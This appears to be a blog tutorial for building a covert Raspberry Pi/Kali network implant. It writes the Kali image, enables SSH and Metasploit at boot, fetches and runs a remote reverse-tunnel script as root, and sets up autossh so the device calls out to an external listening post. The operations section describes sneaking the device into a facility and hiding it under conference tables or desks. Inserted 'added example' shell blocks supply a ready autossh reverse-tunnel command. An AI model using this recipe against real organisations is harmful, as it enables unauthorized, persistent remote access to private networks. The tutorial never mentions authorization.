Building a Network Implant With a Raspberry Pi and Kali

I recently received my Raspberry Pi Model B from Element 14 and was trying to come up with a creative way to use it. I looked around the internet and found a bunch of people doing some really cool stuff like sending their RPis into space and building automated coffee machines, but nothing really sparked my interest. Pwnplugs are expensive. The Raspberry Pwn script is cool, but doesn’t fit all of my needs. I heard that Kali Linux is supported on the Raspberry Pi and it seemed like a match made in heaven so I figured why not turn it into a drop box and have it try to connect back out to me. Although it won’t have all the cool tunneling and filter evasion stuff that a Pwnplug or Powerpwn has, it should get the job done.

Shopping list

Download and Install Kali

First, download the Kali image for Raspberry Pi from here, and compare its checksum with the one published on the download page before going any further. A truncated or tampered image is the last thing you want on a box that will sit unattended inside someone else’s network.

Then unzip the image.

gunzip kali-linux-1.0-armel-raspberrypi.img.gz

Check the name of your SD card.

df -h

If using the SDHC card I posted above, it should show up as roughly 8GB. Note that df lists mounted partitions (e.g. /dev/mmcblk0p1), while the device you write the image to is the whole card, /dev/mmcblk0. If the card was not auto-mounted it will not appear in df at all; in that case look at dmesg or lsblk right after inserting it.

Unmount every mounted partition of the SD card so that the whole device can be written. Running umount against /dev/mmcblk0 itself does nothing if the auto-mounter mounted /dev/mmcblk0p1.

umount /dev/mmcblk0p1

Change /dev/mmcblk0p1 to reflect whatever your SD card’s partition is called, and repeat for any other mounted partition of the card.

Then use dd to write the Kali .img to the SD card.

sudo dd bs=512k if=kali-linux-1.0-armel-raspberrypi.img of=/dev/mmcblk0

Change /dev/mmcblk0 to reflect the name of your SD card again, and double-check it: dd will just as happily overwrite your laptop’s disk if you point it at the wrong device. dd does not display its status, so if you are concerned that it has stopped working, start up top and see if it is running (or try ps xfaw | grep dd). Sending the dd process SIGUSR1 makes GNU dd print how much it has written so far without interrupting it.

Once dd has completed, eject the SD card and plug it into the RPi’s SD card slot. Then attach the HDMI cable to your monitor of choice and the RPi’s port, as well as the USB keyboard and ethernet cable. Then connect the power cable and watch the device boot up. When you reach a command prompt, you’re all set and have verified the OS is working. Default creds are root / toor.
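The download-check, unmount and write steps above, collected into one script. This is an added example and not the post’s own commands; it assumes GNU coreutils (sha1sum, dd with conv=fsync) and a Linux /proc/mounts, and the image and device names are the post’s placeholders. It goes beyond the plain dd in the post in two ways a practitioner wants: it unmounts every mounted partition of the card rather than the raw device, and it reads the card back afterwards to prove the write actually landed.

```shell
#!/bin/sh
# Added example, not the post's own commands. Assumes GNU coreutils (sha1sum,
# dd with conv=fsync) and a Linux /proc/mounts. Device names are placeholders.

# Compare the downloaded image with the hash published next to it.
verify_checksum() {
    img="$1"; expected="$2"
    actual=$(sha1sum "$img" | cut -d' ' -f1)
    [ "$actual" = "$expected" ]
}

# Unmount every mounted partition of the target device. The desktop
# auto-mounter mounts /dev/mmcblk0p1, and 'umount /dev/mmcblk0' leaves it alone.
unmount_partitions() {
    dev="$1"
    [ -r /proc/mounts ] || return 0
    for part in $(awk -v d="$dev" '$1 ~ ("^" d) {print $1}' /proc/mounts); do
        umount "$part" || return 1
    done
}

# Read the first <image size> bytes back from the card and compare hashes;
# a card that silently dropped writes (or lied about its capacity) fails here.
verify_written() {
    img="$1"; target="$2"
    size=$(wc -c < "$img" | tr -d ' ')
    expected=$(sha1sum "$img" | cut -d' ' -f1)
    actual=$(head -c "$size" "$target" | sha1sum | cut -d' ' -f1)
    [ "$actual" = "$expected" ]
}

# dd the image, force it out to the media, then verify the read-back.
write_and_verify() {
    img="$1"; target="$2"
    dd if="$img" of="$target" bs=4096k conv=fsync 2>/dev/null || return 1
    sync
    verify_written "$img" "$target"
}

# Usage (as root, after verify_checksum has passed against the published hash):
#   unmount_partitions /dev/mmcblk0 \
#     && write_and_verify kali-linux-1.0-armel-raspberrypi.img /dev/mmcblk0
```

The read-back is the part people skip. A counterfeit or worn card can accept the whole dd without error and still hand back garbage, and the first you hear of it is a Pi that never checks in.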

Resizing the SDHC card

It has been reported that the image may not take up the full SDHC card and you’ll be left with a bunch of useless space. I haven’t experienced the issue except with the soft-float wheezy image, but if you do, here’s how to fix that.

The following will install the raspi-config script that Raspbian ships with. It includes “expand_rootfs”, which tells the file system to use the full available space on the SD card. Note that these packages are fetched over plain http and installed with dpkg directly, which bypasses apt’s signature checks, so do this from a network you trust.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20121028_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i triggerhappy_0.3.4-2_armel.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb

Finally, run the following command to get started.

raspi-config

Then choose expand_rootfs from the menu. This should take some time. Once it’s completed, just reboot and carry on.

Make some basic configuration changes

First, make sure you change the default root password to something difficult to guess.

passwd

Turn on SSH. Every copy of this image ships with the same pre-generated SSH host keys, so also regenerate them before the box goes anywhere (remove /etc/ssh/ssh_host_* and reconfigure openssh-server); otherwise anyone who has downloaded the same image holds your implant’s host private key.

/etc/init.d/ssh start
update-rc.d ssh enable

Create yourself a non-root user.

adduser $WHATEVER
su $WHATEVER

If you want, you can have Metasploit start up on boot. (I would wait and do this manually as needed.)

service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable

Setup SSH

Install autossh

apt-get -y install autossh

Then use wget to pull down a script from Github that will set up the tunneling for us. Read it before you run it: it is fetched over plain http and runs as root, so confirm you actually got what you expected.

wget http://github.com/mikeymckay/reverse_ssh_tunnel/raw/master/setup_reverse_tunnel.sh
chmod +x ./setup_reverse_tunnel.sh
./setup_reverse_tunnel.sh

Before running the script, however, there are a few key pieces of information that you should have ready before the script asks for them:

Finally, exchange keys so that neither side is prompted for a password. Run the first command from the Pi (it copies the Pi’s key to the middleman) and the second from the middleman server (it copies the middleman’s key to the Pi). The second one has to happen while the Pi is still on a network you can reach it from, and it also pins the Pi’s host key in the middleman’s known_hosts:

ssh-copy-id root@middlemanserver
ssh-copy-id root@yourpi
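One thing the commands above do not address: the Pi will be left where anyone can pick it up, and whoever does gets the private key on its SD card. If that key is a root key to your middleman, losing the Pi means losing the listening post. The following is an added shell example, not from the post or from setup_reverse_tunnel.sh, showing the alternative: an unprivileged account on the middleman whose authorized_keys entry allows the reverse tunnel and nothing else, plus the autossh invocation the Pi would run at boot. The hostname middleman.example, the account beacon and the port 2222 are placeholders.

```shell
#!/bin/sh
# Added example (not from the post or from setup_reverse_tunnel.sh).
# Placeholders: middleman host, tunnel account and reverse port.
MIDDLEMAN_HOST="middleman.example"
TUNNEL_USER="beacon"
REVERSE_PORT=2222

# Accept only a bare OpenSSH public-key line before it goes anywhere near
# authorized_keys; a stray option string there would widen access, not narrow it.
valid_pubkey_line() {
    case "$1" in
        ssh-rsa\ *|ssh-ed25519\ *|ecdsa-sha2-*\ *) return 0 ;;
        *) return 1 ;;
    esac
}

# authorized_keys entry for the middleman: no pty, no agent or X11 forwarding,
# and any attempt at a shell runs /bin/false and exits. 'ssh -N -R ...' never
# requests a session, so the forced command never gets in the tunnel's way.
restricted_authorized_key() {
    printf 'no-pty,no-agent-forwarding,no-X11-forwarding,command="/bin/false" %s\n' "$1"
}

# Append the restricted entry for a public key file to an authorized_keys file
# (on the middleman: ~beacon/.ssh/authorized_keys), creating it with mode 0600.
install_restricted_key() {
    pubkey_file="$1"; authorized_keys="$2"
    key=$(head -n 1 "$pubkey_file")
    valid_pubkey_line "$key" || return 1
    ( umask 077; restricted_authorized_key "$key" >> "$authorized_keys" )
}

# The autossh line the Pi runs at boot (e.g. from /etc/rc.local).
#  -M 0                    leave liveness to the ssh keepalives below
#  -N                      open no shell on the middleman
#  ExitOnForwardFailure    a stale listener on the middleman fails the session
#                          so autossh retries, instead of leaving you tunnel-less
#  StrictHostKeyChecking   rely on the host key pinned during ssh-copy-id, so a
#                          MITM on the way out gets nothing
# The -R bind lands on the middleman's loopback (GatewayPorts defaults to no).
autossh_command() {
    printf 'autossh -M 0 -f -N -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -o "ExitOnForwardFailure yes" -o "StrictHostKeyChecking yes" -R %s:127.0.0.1:22 %s@%s' \
        "$REVERSE_PORT" "$TUNNEL_USER" "$MIDDLEMAN_HOST"
}

# Usage:
#   on the middleman:  install_restricted_key /path/to/pi_id_rsa.pub ~beacon/.ssh/authorized_keys
#   on the Pi:         eval "$(autossh_command)"
#   back on the middleman, once the Pi calls home:  ssh -p 2222 root@127.0.0.1
```

With this in place a recovered Pi gives an attacker a key that can open a port on your middleman’s loopback and nothing more, and the sshd they reach through it is the one on the Pi they already hold.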

Operations

Upon entering a facility, find an ethernet port with access out to the internet (more common than you’d think) as well as a standard wall outlet, unless you have a battery pack. Plug both cables into their respective ports and walk out.

My favorite locations are under conference room tables, copy rooms, secretary desks, and common areas such as “touchdown spaces.”

Once the device is planted, and assuming it has a connection out, it should automatically connect back to your listening post, and you now have a presence inside the network. Assume it will eventually be found: whoever picks it up can read everything on the SD card, including the key it uses to reach you, which is why that key should be good for nothing but the tunnel.

Conclusion

And just like that, you have a network implant that will beacon out to you over an SSH tunnel as soon as it gets an internet connection. It would be great to combine this with an EC2 micro instance so that you don’t have to sacrifice a laptop and could have an “always on” listening post.

I’m sure I’ve forgotten some things, and some parts may need more detail or not work altogether. I will update this page as I work out those bugs.

Credit to T. Bradley for the idea as well as Mikey McKay for the auto-tunnel script!

[Image: Raspberry Pi with the Ninja PiBow Case]